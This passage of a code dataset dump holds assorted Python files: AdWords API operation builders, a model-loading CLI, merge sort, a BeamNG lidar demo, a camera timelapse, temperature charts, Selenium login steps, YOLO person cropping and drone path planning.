https://developers.google.com/adwords/api/docs/reference/v201705/AdGroupAdService.AdGroupAd\n 'xsi_type': 'AdGroupAd',\n 'adGroupId': adgroup_id,\n 'ad': ad_dict,\n 'status': 'PAUSED',\n # TODO: 'labels': [],\n },\n 'operator': 'ADD'\n }\n return operation\n\n\ndef build_ad(headline1, headline2, description, urls, ad_id=None, adtype='ExpandedTextAd'):\n result = {\n 'xsi_type': adtype,\n 'headlinePart1': headline1,\n 'headlinePart2': headline2,\n 'description': description,\n 'finalUrls': list(urls),\n }\n if ad_id:\n result['id'] = ad_id\n return result\n\n\ndef add_restriction(adgroup_id, restriction_dict, effect='SHOW'):\n \"\"\"\n A restriction to display an Ad. 
For example, a Keyword dict.\n    If 'effect' is \"HIDE\", will enforce the Ad to NOT be displayed\n    when the restriction got matched.\n    \"\"\"\n    if effect.upper() == 'SHOW':\n        operand_type = 'BiddableAdGroupCriterion'\n    elif effect.upper() == 'HIDE':\n        operand_type = 'NegativeAdGroupCriterion'\n    else:\n        raise NotImplementedError(\"Desired 'effect' was not recognized\")\n\n    operation = {\n        'xsi_type': 'AdGroupCriterionOperation',\n        'operand': {\n            'xsi_type': operand_type,\n            'adGroupId': adgroup_id,\n            'criterion': restriction_dict,\n        },\n        'operator': 'ADD'\n    }\n    return operation\n\n\ndef build_keyword(text, keyword_id=None, match='BROAD'):\n    result = {\n        'xsi_type': 'Keyword',\n        'text': text,\n        'matchType': match, # Only EXACT, PHRASE or BROAD\n    }\n    if keyword_id:\n        result['id'] = keyword_id\n    return result\n\n\ndef add_campaign(campaign_id: 'Long',\n                 campaign_name: 'String',\n                 budget_id: 'Long' = None,\n                 status: 'String' = 'PAUSED',\n                 advertising_channel: 'String' = 'SEARCH',\n                 operator: 'String' = 'ADD',\n                 **kwargs):\n    bidding_strategy = build_new_bidding_strategy_configuration(with_bids=False, strategy_type='MANUAL_CPC')\n    operation = {\n        'xsi_type': 'CampaignOperation',\n        'operator': operator.upper(),\n        'operand': {\n            # https://developers.google.com/adwords/api/docs/reference/v201705/CampaignService.Campaign\n            'xsi_type': 'Campaign',\n            'id': campaign_id,\n            'name': campaign_name,\n\n            ## From: https://developers.google.com/adwords/api/docs/samples/python/campaign-management#add-complete-campaigns-using-batch-jobs\n            # 'advertisingChannelType': 'SEARCH',\n            # Recommendation: Set the campaign to PAUSED when creating it to\n            # stop the ads from immediately serving. 
Set to ENABLED once\n # you've added targeting and the ads are ready to serve.\n 'status': 'PAUSED',\n # Note that only the budgetId is required\n # 'budget': {\n # 'budgetId': budget_id\n # },\n # 'biddingStrategyConfiguration': {\n # 'biddingStrategyType': 'MANUAL_CPC'\n # }\n },\n }\n return operation\n\n\ndef set_campaign_budget(budget_id, campaign_id):\n return {\n 'xsi_type': 'CampaignOperation',\n 'operator': 'SET',\n\n 'operand': {\n 'id': int(campaign_id),\n 'budget': {\n 'xsi_type': 'Budget',\n 'budgetId': int(budget_id),\n },\n },\n }\n\n\ndef add_budget(budget: 'Money',\n budget_id: 'Long',\n delivery: 'String' = 'ACCELERATED',\n budget_name: 'String' = None,\n **kwargs):\n operation = {\n 'xsi_type': 'BudgetOperation',\n 'operator': 'ADD',\n\n 'operand': {\n 'xsi_type': 'Budget',\n 'budgetId': int(budget_id),\n 'amount': build_money(budget),\n },\n }\n\n if delivery:\n operation['operand']['deliveryMethod'] = delivery\n\n if budget_name:\n operation['operand'].update({\n 'isExplicitlyShared': True,\n 'name': budget_name\n })\n else:\n operation['operand']['isExplicitlyShared'] = False\n\n return operation\n\n\ndef build_money(money):\n return {\n 'xsi_type': 'Money',\n 'microAmount': money,\n }\n\n\ndef add_biddable_adgroup_criterion_operation(adgroup_id,\n operator,\n xsi_type,\n criteria_id=None,\n criterion_params={},\n **kwargs):\n criterion = {'xsi_type': xsi_type}\n if criteria_id:\n criterion['id'] = criteria_id\n for key in criterion_params:\n criterion[key] = criterion_params[key]\n\n operand = {\n 'xsi_type': 'BiddableAdGroupCriterion',\n 'criterion': criterion,\n 'adGroupId': adgroup_id,\n }\n for key in kwargs:\n operand[key] = kwargs[key]\n\n operation = {\n 'xsi_type': 'AdGroupCriterionOperation',\n 'operand': operand,\n 'operator': operator\n }\n return operation\n\n\ndef build_new_bid_type(xsi_type, value):\n bid_type = {\n 'xsi_type': xsi_type,\n 'bid': {\n 'xsi_type': 'Money',\n 'microAmount': value\n }\n }\n return bid_type\n\n\ndef build_new_bidding_strategy_configuration(with_bids=True, strategy_type=None):\n bidding_strategy = {'xsi_type': 'BiddingStrategyConfiguration'}\n if with_bids:\n bidding_strategy['bids'] = []\n if strategy_type:\n bidding_strategy['biddingStrategyType'] = strategy_type\n return bidding_strategy\n\n\ndef add_keyword_cpc_bid_adjustment_operation(adgroup_id,\n criteria_id,\n value):\n bid_operation = add_biddable_adgroup_criterion_operation(\n adgroup_id,\n 'SET',\n 'Keyword',\n criteria_id\n )\n bidding_strategy = build_new_bidding_strategy_configuration()\n bid_operation['operand']['biddingStrategyConfiguration'] = bidding_strategy\n bid_type = build_new_bid_type('CpcBid', value)\n bid_operation['operand']['biddingStrategyConfiguration']['bids'].append(bid_type)\n return bid_operation\n\n\ndef add_new_keyword_operation(adgroup_id: 'Long' = None,\n text: 'String' = None,\n keyword_match_type: 'String' = None,\n status: 'String' = 'PAUSED',\n cpc_bid: 'Bid' = None,\n **kwargs):\n new_keyword_operation = add_biddable_adgroup_criterion_operation(\n adgroup_id,\n 'ADD',\n 'Keyword',\n criterion_params={\n 'text': text,\n 'matchType': keyword_match_type.upper(),\n },\n userStatus=status.upper()\n )\n bidding_strategy = build_new_bidding_strategy_configuration()\n new_keyword_operation['operand']['biddingStrategyConfiguration'] = bidding_strategy\n bid_type = build_new_bid_type('CpcBid', cpc_bid)\n new_keyword_operation['operand']['biddingStrategyConfiguration']['bids'].append(bid_type)\n return new_keyword_operation\n\n\ndef 
add_adgroup(campaign_id: 'Long',\n adgroup_id: 'Long',\n adgroup_name: 'String',\n status: 'String' ='PAUSED',\n operator: 'String' ='ADD',\n **kwargs):\n operation = {\n 'xsi_type': 'AdGroupOperation',\n 'operand': {\n # https://developers.google.com/adwords/api/docs/reference/v201705/AdGroupService.AdGroup\n 'xsi_type': 'AdGroup',\n 'campaignId': campaign_id,\n 'id': adgroup_id,\n 'name': adgroup_name,\n 'status': status,\n },\n 'operator': operator,\n }\n return operation\n\n\ndef add_adgroup_cpc_bid_adjustment_operation(campaign_id,\n adgroup_id,\n value):\n bid_operation = add_adgroup(campaign_id,\n adgroup_id,\n 'SET')\n bidding_strategy = build_new_bidding_strategy_configuration()\n bidding_strategy['bids'].append(build_new_bid_type('CpcBid', value))\n bid_operation['operand']['biddingStrategyConfiguration'] = bidding_strategy\n return bid_operation\n","sub_path":"adwords_client/adwordsapi/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":11409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"376699658","text":"import argparse\nimport os\nimport glob\nimport re\nimport numpy as np\nfrom src.models import predict_model, seq2seq\nfrom src.data.word_utils import Vocab\nimport logging\n\ndef create_model_loader_args(parser):\n parser.add_argument(\n '--model_specs',\n help='Experiment number to load model and spec for',\n default='highest',\n )\n parser.add_argument(\n '--model',\n help='Path to saved model weights, must be compatiable with experiment spec file',\n default='latest',\n )\n parser.add_argument(\n '--data_specs',\n help='Path to yaml file for data specification',\n default='specs/data_specs.yaml',\n )\n\n return parser\n\ndef load_model_from_args(args):\n\n if args.model_specs == 'highest':\n # Find all experiment spec files\n experiment_specs = glob.glob(\"specs/exp*.yaml\")\n # Get spec file with highest number\n file_nums = []\n for i in experiment_specs:\n experiment_nums = re.search(\"(\\d+).yaml$\", i) # NOQA\n file_nums.append(int(experiment_nums.group(1)))\n specs_filepath = experiment_specs[np.argmax(file_nums)]\n\n else:\n specs_filepath = args.model_specs\n\n specs = predict_model.load_yaml(specs_filepath)\n\n exp = re.search(\"(exp\\d+)\", specs_filepath).group(1) # NOQA\n checkpoint_dir = f\"models/checkpoints/{exp}\"\n vocab_filepath = os.path.join(checkpoint_dir, 'vocab.json')\n vocab = Vocab(vocab_filepath)\n\n model, encoder_model, decoder_model = seq2seq.build_model(**specs['model_params'], vocab_size=len(vocab))\n\n log(f'Loaded model using {specs_filepath}')\n\n if args.model == 'latest':\n weights_checkpoint_filepath = predict_model.latest_checkpoint(checkpoint_dir)\n log(f'Loaded latest weights from {weights_checkpoint_filepath}')\n else:\n weights_checkpoint_filepath = args.model\n try:\n log(f'Loaded model weights from {weights_checkpoint_filepath}')\n except Exception:\n log(f\"Couldn't find model weights at {weights_checkpoint_filepath}\")\n\n model.load_weights(weights_checkpoint_filepath)\n\n return model, encoder_model, decoder_model, vocab_filepath, specs_filepath\n\n\ndef log(message):\n logger = logging.getLogger(__name__)\n logger.info(message)\n\ndef create_inference_args(parser):\n parser.add_argument('--method', help='Inference method', default='beam_search')\n return 
parser\n","sub_path":"src/cli/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"538487783","text":"import random\nimport time\n\n\ndef merge_sort(m):\n if len(m) <= 1 :\n return m\n\n mid = len(m) // 2\n\n left = merge_sort(m[:mid])\n right = merge_sort(m[mid:])\n\n result = []\n while len(left) > 0 and len(right) > 0 :\n if left[0] <= right[0] :\n result.append(left.pop(0))\n else :\n result.append(right.pop(0))\n # if len(left) > 0 :\n # result.extend(left)\n # if len(right) > 0 :\n # result.extend(right)\n\n # if len(left) > 0 :\n # for i in range(len(left)):\n # result.append(left.pop(0))\n # if len(right) > 0 :\n # for i in range(len(right)):\n # result.append(right.pop(0))\n\n # if len(left) > 0 :\n # result += left\n #\n # if len(right) > 0 :\n # result += right\n\n\n return result\n\n\ndef merge_sort1(m):\n if len(m) <= 1:\n return m\n\n left = merge_sort1(m[:len(m)//2])\n right = merge_sort1(m[len(m)//2:])\n\n i, j, k = 0, 0, 0\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n m[k] = left[i]\n i += 1\n else:\n m[k] = right[j]\n j += 1\n k += 1\n\n if i == len(left): #만약 left의 원소를 모두 채웠고, right가 남아있을 때.\n while j < len(right):\n m[k] = right[j]\n j += 1\n k += 1\n elif j == len(right): #만약 right의 원소를 모두 채웠고, left가 남아있을 때.\n while i < len(left):\n m[k] = left[i]\n i += 1\n k += 1\n return m\n\narr = [random.randint(1,100) for _ in range(1000000)]\n\n# arr = [69, 10, 30, 2, 16, 8, 31, 22]\n\narr1 = arr[:]\n\nst = time.time()\nprint( merge_sort(arr)[:10] )\nprint(time.time() - st)\n\nst = time.time()\nprint( merge_sort1(arr1)[:10] )\nprint(time.time() - st)\n\n","sub_path":"Algorithm and Data Structure/Algorithm Problem Solving/SW 문제해결 기본/p373_리스트_연습문제1_병합정렬.py","file_name":"p373_리스트_연습문제1_병합정렬.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367305053","text":"\"\"\"\n.. module:: west_coast_random\n :platform: Windows\n :synopsis: Example code making a scenario in west_coast_usa and having the\n vehicle span the map while emitting Lidar.\n\n.. 
moduleauthor:: Marc Müller \n\n\"\"\"\nimport mmap\nimport random\nimport sys\n\nfrom time import sleep\n\nimport numpy as np\n\nfrom beamngpy import BeamNGpy, Scenario, Vehicle, setup_logging\nfrom beamngpy.sensors import Lidar\n\n\ndef main():\n    random.seed(1703)\n    setup_logging()\n\n    beamng = BeamNGpy('localhost', 64256)\n    bng = beamng.open(launch=True)\n\n    scenario = Scenario('west_coast_usa', 'lidar_demo',\n                        description='Spanning the map with a lidar sensor')\n\n    vehicle = Vehicle('ego_vehicle', model='etk800',\n                      licence='RED', color='Red')\n\n    lidar = Lidar(offset=(0, 0, 1.6))\n    vehicle.attach_sensor('lidar', lidar)\n\n    scenario.add_vehicle(vehicle, pos=(-717.121, 101, 118.675),\n                         rot=None, rot_quat=(0, 0, 0.3826834, 0.9238795))\n    scenario.make(bng)\n\n    try:\n        bng.set_deterministic()  # Set simulator to be deterministic\n        bng.set_steps_per_second(60)  # With 60hz temporal resolution\n\n        bng.load_scenario(scenario)\n        bng.hide_hud()\n        bng.start_scenario()\n\n        vehicle.ai_set_mode('span')\n        print('Driving around for 60 seconds...')\n        sleep(60)\n    finally:\n        bng.close()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"examples/west_coast_lidar.py","file_name":"west_coast_lidar.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349980909","text":"from time import sleep\nfrom picamera import PiCamera\n\ncamera = PiCamera()\n\ncamera.resolution = (3280,2464)\n\n'''camera.start_preview()'''\n\n\nsleep(1)\nfor filename in camera.capture_continuous('timelapse/img{counter:03d}.jpg'):\n    print('Captured %s' % filename)\n    sleep(120) # wait 2 minutes\n","sub_path":"camera-module/timelapse.py","file_name":"timelapse.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"248539904","text":"import pygal\nfrom pygal.style import Style\n\nclass Chart:\n\tdef __init__(self, database):\n\t\tself.db = database\n\t\tself.custom_Style = Style(colors=['rgb(0, 204, 0)','rgb(0, 0, 153)','rgb(204, 51, 0)'])\n\t\t\n\tdef make_Day_Chart(self, day, path=''):\n\t\tquery = (\"SELECT TIME(date), temp_in, temp_out \"\n\t\t\t\t \"FROM ( SELECT @row := @row + 1 as rownum, date, temp_in, temp_out \"\n\t\t\t\t \"FROM ( SELECT @row := 0) r, temperature ) ranked \"\n\t\t\t\t \"WHERE rownum %2 = 1 AND Date(date) = '\" + str(day) + \"'\")\n\t\tresults = self.db.execute_Query(query)\n\t\tchart = pygal.TimeDeltaLine(x_label_rotation=25,interpolate='cubic',fill=True)\n\t\tchart.title = \"Day: \" + str(day)\n\t\t\n\t\thome = [[r[0], r[1]] for r in results]\n\t\tout = [[r[0], r[2]] for r in results]\n\t\tchart.add('Home', home)\n\t\tchart.add('Outside', out)\n\t\tif path:\n\t\t\tprint(\"try to save chart\")\n\t\t\tchart.render_to_png(path)\n\t\t\treturn\n\t\tchart = chart.render_data_uri()\n\t\tprint('chart rendered')\n\t\treturn chart\n\t\t\n\tdef make_Month_Chart(self, month, year, path=''):\n\t\tquery = (\"select date(date), round(avg(temp_out), 1), round(avg(temp_in), 1) \"\n\t\t\t\t \"from temperature \" \n\t\t\t\t \"where MONTH(date) = '\" + str(month) + \"' AND YEAR(date) ='\" + str(year) + \"' \"\n\t\t\t\t \"group by date(date)\")\n\t\tresults = self.db.execute_Query(query)\n\t\tchart = pygal.DateLine(x_label_rotation=20,interpolate='cubic', style=self.custom_Style,\n\t\t\t\t\t\t\t\t x_value_formatter=lambda dt: dt.strftime(\"%d-%m-%Y\"), fill=True)\n\t\t\n\t\tchart.title = \"Month: %s-%s\" % (year, month)\n\t\thome = [[r[0], r[2]] 
for r in results]\n\t\toutside = [[r[0], r[1]] for r in results]\n\t\tchart.add('Home average', home)\n\t\tchart.add('Outside average', outside)\n\t\t\n\t\tif path:\n\t\t\tprint(\"try to save chart\")\n\t\t\tchart.render_to_png(path)\n\t\t\treturn\n\t\t\n\t\tchart = chart.render_data_uri()\n\t\treturn chart\n\t\t\n\tdef make_Year_Chart(self, year, path='', sort='avg'):\n\t\tif sort == 'avg':\n\t\t\tquery = \"select weekofyear(date), round(avg(temp_in),1), round(avg(temp_out),1)\"\n\t\telif sort == \"max\":\n\t\t\tquery = \"select weekofyear(date), round(max(temp_in),1), round(max(temp_out),1)\" \n\t\telse:\n\t\t\tquery = \"select weekofyear(date), round(min(temp_in),1), round(min(temp_out),1)\"\n\t\tquery += (\" from temperature \"\n\t\t\t\t \"where year(date) = '\" + str(year) + \"' \"\n\t\t\t\t \"group by weekofyear(date)\")\n\t\tresults = self.db.execute_Query(query)\n\t\tchart = pygal.Line(x_label_rotation=25,interpolate='cubic',style=self.custom_Style, fill=True)\n\t\tchart.title = \"Year: %s\" % (year)\n\t\tchart.x_labels = ['Week' + str(r[0]) for r in results]\n\t\t\n\t\tif sort == 'avg':\n\t\t\thome = \"Home average\"\n\t\t\tout = \"Outside average\"\n\t\telif sort == 'max':\n\t\t\thome = \"Home max\"\n\t\t\tout = \"Outside max\"\n\t\telse:\n\t\t\thome = \"Home min\"\n\t\t\tout = \"Outside min\"\t\n\t\t\n\t\tchart.add(home, [r[1] for r in results])\n\t\tchart.add(out, [r[2] for r in results])\n\t\t\t\n\t\tif path:\n\t\t\tprint(\"try to save chart\")\n\t\t\tchart.render_to_png(path)\n\t\t\treturn\n\t\t\t\n\t\tchart = chart.render_data_uri()\n\t\treturn chart\n","sub_path":"pyweb/data/Chart.py","file_name":"Chart.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"189364940","text":"from watchdog.observers import Observer\nimport time\nfrom watchdog.events import FileSystemEventHandler\nimport os\n\nclass MyHandler(FileSystemEventHandler):\n    print('Hi')\n    i = 1\n    def on_modified(self,event):\n        print('hi1')\n        for filename in os.listdir(folder_to_track):\n            src = folder_to_track + \"/\" + filename\n            new_destination = folder_destination + \"/\" + filename\n            print(src,new_destination)\n            os.rename(src, new_destination)\n            print('hi2')\n\nfolder_destination = '/Users/Utkarsh GuptA/Desktop/IB/destination'\nfolder_to_track = '/Users/Utkarsh GuptA/Desktop/IB/source'\nevent_handler = MyHandler()\nprint('hi4')\nobserver = Observer()\nprint('hi5')\nobserver.schedule(event_handler, folder_to_track, recursive = True)\nprint('hi4=6')\nobserver.start()\n\ntry:\n    while True:\n        time.sleep(10)\nexcept KeyboardInterrupt:\n    observer.stop()\nobserver.join()\n","sub_path":"sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"107104707","text":"import allure\nimport pytest\nfrom selenium.webdriver.common.by import By\nfrom Locators import LoginPageLocators\nfrom Pages.LoginPageObjects import LoginPage\nfrom Utils import Attachments, Urls, Waits, Params\n\n\n@pytest.mark.usefixtures(\"driver\")\n@allure.MASTER_HELPER.BLOCKER\ndef login_as_customer(driver):\n    page = LoginPage(driver)\n    driver.get(Urls.base_url + \"/\")\n    with allure.MASTER_HELPER.step(\"Click login\"):\n        Attachments.screenshot(driver)\n        page.login.click()\n\n    Waits.until_element_will_clickable(driver, By.XPATH, LoginPageLocators.link_customer)\n    with allure.MASTER_HELPER.step(\"Login Modal Form\"):\n        
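        # Within the "Login Modal Form" step: screenshot for the Allure report, then switch to the customer flow.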
Attachments.screenshot(driver)\n page.link_customer.click()\n\n Waits.until_element_will_clickable(driver, By.ID, LoginPageLocators.customer_login_phone_id)\n with allure.MASTER_HELPER.step(\"Fill in phone number\"):\n Attachments.screenshot(driver)\n page.phone_number.clear()\n page.phone_number.send_keys(Params.phone_number_value)\n page.button_confirm.click()\n\n Waits.until_element_will_clickable(driver, By.ID, LoginPageLocators.customer_login_sms_code)\n with allure.MASTER_HELPER.step(\"Fill in sms code\"):\n Attachments.screenshot(driver)\n page.sms_code.clear()\n page.sms_code.send_keys(Params.sms_code_value)\n page.button_confirm2.click()\n\n\n@allure.MASTER_HELPER.BLOCKER\ndef login_as_business(driver):\n page = LoginPage(driver)\n driver.get(Urls.base_url + \"/\")\n with allure.MASTER_HELPER.step(\"Click login\"):\n Attachments.screenshot(driver)\n page.login.click()\n\n Waits.until_element_will_clickable(driver, By.XPATH, LoginPageLocators.link_business)\n page.link_business.click()\n\n Waits.until_element_will_clickable(driver, By.XPATH, LoginPageLocators.button_confirm_business)\n with allure.MASTER_HELPER.step(\"Fill in authorization fields\"):\n Attachments.screenshot(driver)\n page.email_input.clear()\n page.email_input.send_keys(Params.email_value)\n page.password_input.clear()\n page.password_input.send_keys(Params.password_value)\n page.button_confirm_business_login.click()\n","sub_path":"Steps/LoginSteps.py","file_name":"LoginSteps.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"327729181","text":"#python libraries\nimport cv2\nimport numpy as np\nimport argparse\nimport os\n\n#chainer\nfrom chainer import serializers, Variable\nimport chainer.functions as F\n\n#python scripts\nfrom yolov2 import *\nfrom CocoPredictor import *\n\n\n# save label list\ndef save_label_list(label_list,file_address_name):\n\n f = open(file_address_name,'w')\n for label in label_list:\n f.write(str(label) + '\\n')\n\n\n#main\nif __name__ == \"__main__\":\n\n #video_path = '../../dataset/videos/gairan_1/camera_1.avi'\n #save_path = '../../dataset/images/overlaped/2017_08_18/for_training/humans/11/'\n\n parser = argparse.ArgumentParser(description='extract person images')\n parser.add_argument('--video_path', '-v', type=str, default=False,help='path to video')\n parser.add_argument('--save_no', '-s', type=int, default=False,help='save directory number')\n args = parser.parse_args()\n\n video_path = args.video_path\n save_path = '../../dataset/images/overlaped/2017_08_18/for_training/humans/'+str(args.save_no)+'/'\n\n cap = cv2.VideoCapture(video_path)\n\n if not os.path.isdir(save_path):\n os.makedirs(save_path)\n\n coco_predictor = CocoPredictor()\n\n frame_cnt = 0\n person_cnt = 0\n\n person_label = []\n\n cv2.namedWindow(\"video\", cv2.WINDOW_NORMAL)\n\n while(True):\n\n ret, frame = cap.read()\n frame_cnt += 1\n\n if ret is not True:\n break\n\n nms_results = coco_predictor(frame)\n\n for result in nms_results:\n\n left, top = result[\"box\"].int_left_top()\n\n right, bottom = result[\"box\"].int_right_bottom()\n\n if result[\"class_id\"] == 0:\n\n x1, y1 = result[\"box\"].int_left_top()\n x2, y2 = result[\"box\"].int_right_bottom()\n\n cv2.imwrite(save_path+str(person_cnt)+'.jpg', frame[y1:y2, x1:x2])\n\n cv2.rectangle(frame, (x1, y1), (x2, y2), (255, 0, 255), 3)\n text = '%s(%2d%%)' % (result[\"label\"], result[\"probs\"].max()*result[\"conf\"]*100)\n print(text)\n cv2.putText(frame, 
text, (left, top-7), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 255, 255), 2)\n\n person_label.append(0)\n person_cnt += 1\n\n cv2.imshow(\"video\", frame)\n\n key = cv2.waitKey(1) & 0xFF\n\n if key == 27:\n break\n\n cap.release()\n\n #save_label_list(person_label, save_path+'labels.txt')\n print(frame_cnt)\n print(person_cnt)\n print(len(person_label))\n","sub_path":"YOLOv2/yolov2_prediction_find_person.py","file_name":"yolov2_prediction_find_person.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"392743753","text":"# -*- coding:utf-8 -*-\nimport sys\nimport optparse\nimport os\n\n\ndef print_usage(option, opt, value, parser):\n usage_message = \"\"\"\n# --------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------------------------------------------------------------\n python write_cnv_frequency.py -p /path/to/work --overlap 0.7 --cnv /cnv/info/path\n# --------------------------------------------------------------------------------------------------------------\n# --------------------------------------------------------------------------------------------------------------\n \"\"\"\n print(usage_message)\n sys.exit()\n\n\ndef write_cnv_freq_sh(wkdir, per, cnv_info_path):\n chroms = [\"chr\" + str(i) for i in range(1, 23)] + [\"chrX\", \"chrY\"]\n cnv_type = [\"deletion\", \"duplication\"]\n python = \"python\"\n py = \"cnvnator_cnv_frequency.py\"\n for chrom in chroms:\n path = os.path.join(wkdir, chrom)\n if not os.path.exists(path):\n os.makedirs(path + \"/deletion/scripts\")\n os.makedirs(path + \"/duplication/scripts\")\n for ct in cnv_type:\n fp = open(path + \"/\" + ct + \"/scripts/\" + chrom + \".sh\", \"w\")\n shell = '''#!/bin/bash\n{python} {py} -p {path}/{ct} -o {wkdir}/{chrom}.{ct}.cnv.freq.txt --overlap {per} --cnv_type {ct} --cnv {cnv_info_path}/cnv.info.{chrom}.list\n'''.format(**locals())\n fp.write(shell)\n fp.close()\n\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('-u', '--usage', help='print more info on how to use this script', action=\"callback\", callback=print_usage)\n parser.add_option('--cnv', dest='cnv', default=None, type='string')\n parser.add_option('-p', '--pwd', dest='pwd', default=None, type='string')\n parser.add_option('--overlap', dest='overlap', type=float)\n (opts, args) = parser.parse_args()\n cnv = opts.cnv\n pwd = opts.pwd\n overlap = opts.overlap\n write_cnv_freq_sh(pwd, overlap, cnv)\n","sub_path":"write_cnv_frequency.py","file_name":"write_cnv_frequency.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508877919","text":"from matplotlib import pyplot as plt\nfrom shapely.geometry import Point, Polygon\nimport shapefile\nimport numpy as np\nimport node\nimport geopy.distance as distance\n\ndrones = 5\n\npolygon = None\npoly_points = None\n\n\ndef line_intersection(l1, l2):\n dx = (l1[0][0] - l1[1][0], l2[0][0] - l2[1][0])\n dy = (l1[0][1] - l1[1][1], l2[0][1] - l2[1][1])\n\n def det(a, b):\n return a[0] * b[1] - a[1] * b[0]\n\n div = det(dx, dy)\n if div == 0:\n print('lines do not intersect')\n\n d = (det(*l1), det(*l2))\n x = det(d, dx) / div\n y = det(d, dy) / div\n return x, y\n\n\nsf = shapefile.Reader(\"shapefiles/dyp\")\nfor shape in list(sf.iterShapes()):\n npoints=len(shape.points) # total points\n 
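    # Note: line_intersection() above solves the 2x2 system with Cramer's rule and
    # treats its arguments as infinite lines, not segments; for example the lines
    # ((0, 0), (2, 2)) and ((0, 2), (2, 0)) intersect at (1.0, 1.0).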
nparts = len(shape.parts) # total parts\n polygon = Polygon(shape.points)\n poly_points = shape.points\n if nparts == 1:\n x_lon = np.zeros((len(shape.points),1))\n y_lat = np.zeros((len(shape.points),1))\n for ip in range(len(shape.points)):\n x_lon[ip] = shape.points[ip][0]\n y_lat[ip] = shape.points[ip][1]\n #plt.plot(x_lon, y_lat)\n\nx_min, y_min, x_max, y_max = polygon.bounds\nprint(polygon.length * 20)\nbitmap = []\nrow = []\nx_range = np.arange(x_min, x_max, 0.0001)\ny_range = np.arange(y_min, y_max, 0.0001)\nfor j in range(0, len(y_range)):\n row = []\n for i in range(0, len(x_range)):\n point = None\n if polygon.contains(Point(x_range[i], y_range[j])):\n plt.scatter(x_range[i], y_range[j], s =.5, c='blue')\n point = node.Node(x_range[i], y_range[j], \"In\")\n else:\n plt.scatter(x_range[i], y_range[j], s=.5, c='yellow')\n point = node.Node(x_range[i], y_range[j], \"Out\")\n row.append(point)\n bitmap.append(row)\n\nshape = np.array(bitmap).shape\n\n# for x in range(0, shape[0]):\n# for y in range(0, shape[1]):\n# if bitmap[x][y].get_state() == \"Out\":\n# try:\n# if bitmap[x+1][y].get_state() == \"In\":\n# if (bitmap[x+1][y-1].get_state() == \"In\" and bitmap[x][y-1].get_state() == \"In\") or (bitmap[x+1][y+1].get_state() == \"In\" and bitmap[x][y+1].get_state() == \"In\"):\n# bitmap[x][y].set_state(\"Partial\")\n# elif bitmap[x-1][y].get_state():\n# if (bitmap[x-1][y-1].get_state() == \"In\" and bitmap[x][y-1].get_state() == \"In\") or (bitmap[x-1][y+1].get_state() == \"In\" and bitmap[x][y+1].get_state() == \"In\"):\n# bitmap[x][y].set_state(\"Partial\")\n# except:\n# pass\n\nx_array = []\ny_array = []\nfor e,x in enumerate(bitmap):\n row = []\n for y in x:\n if y.get_state() in [\"In\", \"Partial\"]:\n row.append(y)\n if e % 2 != 0:\n row.reverse()\n\n for i in row:\n temp = i.get_points()\n x_array.append(temp[0])\n y_array.append(temp[1])\nindex = len(x_array)\ncal = []\nfor i in range(0,len(poly_points)-1):\n result = filter(lambda x: (x <= poly_points[i][1] and x >= poly_points[i+1][1]) or (x >= poly_points[i][1] and x <= poly_points[i+1][1]), y_range)\n for line in result:\n pt = line_intersection((poly_points[i],poly_points[i+1]),((0,line),(x_max,line)))\n cal.append(pt)\n x_array.insert(index, pt[0])\n y_array.insert(index, pt[1])\n\n\n\ntotal_length = 0\nfor i in range(0, len(x_array)-1):\n total_length += distance.vincenty((x_array[i],y_array[i]), ((x_array[i+1],y_array[i+1]))).m\n\npart = total_length/drones\nprint(part)\nclr = ['red', 'orange', 'cyan', 'green', 'coral' ]\n\nx_array.reverse()\ny_array.reverse()\n\ni = 0;\npath_x = [x_array[i]]\npath_y = [y_array[i]]\ntd = 0\ninfo = []\nclr = ['red','blue','cyan','coral','orange']\nfor j in range(0, drones):\n while td <= part and i < len(x_array)-1:\n td += distance.vincenty((x_array[i],y_array[i]), ((x_array[i+1],y_array[i+1]))).m\n i += 1\n path_x.append(x_array[i])\n path_y.append(y_array[i])\n plt.plot(path_x, path_y,color=clr[j])\n d = dict(drone=j+1, distance=td, color=clr[j])\n path_y = [y_array[i]]\n path_x = [x_array[i]]\n info.append(d)\n td = 0\nplt.show()\n[print(x) for x in info]","sub_path":"get_points.py","file_name":"get_points.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"472897069","text":"from pandas_datareader import data as web\nimport datetime\nimport pandas as pd\n\n#Initialize variables\nstart = datetime.datetime(2004,4,19)\nend = datetime.datetime(2016,2,1)\n\n#Load data\nAAPL = 
